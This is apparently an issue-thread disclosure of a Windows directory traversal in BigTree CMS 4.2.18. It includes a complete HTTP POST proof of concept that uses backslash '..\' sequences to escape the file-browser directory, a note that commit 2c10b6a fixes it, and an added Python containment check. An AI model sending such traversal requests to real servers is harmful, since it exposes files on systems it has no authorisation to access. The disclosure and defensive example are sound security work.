Directory Traversal in bigtreecms 4.2.18
FILE: \BigTree-CMS-4.2.18\core\admin\ajax\developer\extensions\file-browser.php
Here, it just filters .. and /, but we can use \ to bypass on Windows.
POC:
POST /BigTree-CMS-4.2.18/site/index.php/admin/ajax/developer/extensions/file-browser/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://localhost/BigTree-CMS-4.2.18/site/index.php/admin/developer/extensions/build/files/
Content-Length: 88
Cookie: bigtree_admin[email]=admin%40admin.com; bigtree_admin[login]=%5B%22session-5933aabe111140.52177449%22%2C%22chain-5932b00a19ac87.74446726%22%5D; PHPSESSID=e5l89mgpbpdp4gumsc0qshlve4; hide_bigtree_bar=
Connection: keep-alive

base_directory=&directory=..\..\..\..\..\&cloud_disabled=true&file=&location=&container=
Trick: use ..\ to bypass on Windows
email : xfkxfk@secbook.net
Should fix any path manipulation issues in Windows environments.
2c10b6a
#302 #289
Thanks, this should be fixed in the 4.2.20 release.
@timbuckingham was this issue ever addressed? And if so, can you point me to the place where it was fixed? Thanks!
There's a referenced commit above where it was resolved: 2c10b6a
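An added example, not part of the issue thread and not BigTree's code: it shows why a filter that only looks for forward-slash traversal leaves the reported `directory` value untouched, and how a containment check on the resolved path rejects it. It is written in Python rather than PHP so that Windows path rules (`ntpath`) can be evaluated on any OS; `naive_filter`, `resolve`, `is_contained` and the base directories are assumptions made for illustration.

```python
import ntpath      # Windows path rules, usable on any OS
import posixpath   # POSIX path rules, for contrast

BASE = r"C:\www\site\extensions"     # constructed base directory
POC_DIRECTORY = "..\\" * 5           # directory= value from the PoC request


def naive_filter(directory: str) -> str:
    """Hypothetical stand-in for a filter that only knows about "../"."""
    return directory.replace("../", "")


def resolve(base: str, directory: str, pathmod=ntpath) -> str:
    """Join and normalise the way the target OS would interpret the path."""
    return pathmod.normpath(pathmod.join(base, directory))


def is_contained(base: str, directory: str, pathmod=ntpath) -> bool:
    """Accept the request only if the resolved path is still inside base."""
    base_n = pathmod.normcase(pathmod.normpath(base))
    target = pathmod.normcase(resolve(base, directory, pathmod))
    try:
        return pathmod.commonpath([base_n, target]) == base_n
    except ValueError:               # e.g. a different drive letter
        return False


if __name__ == "__main__":
    filtered = naive_filter(POC_DIRECTORY)
    print("after naive filter :", filtered)
    print("Windows resolution :", resolve(BASE, filtered))
    print("POSIX resolution   :", resolve("/var/www/site/extensions", filtered, posixpath))
    for candidate in (filtered, "uploads\\img", "uploads/../css", "D:\\secrets", "\\Windows"):
        print(f"{candidate!r:24} contained={is_contained(BASE, candidate)}")
```

The check here is purely lexical; on a real filesystem, resolve symlinks and junctions (for example with `realpath`) before comparing against the base directory.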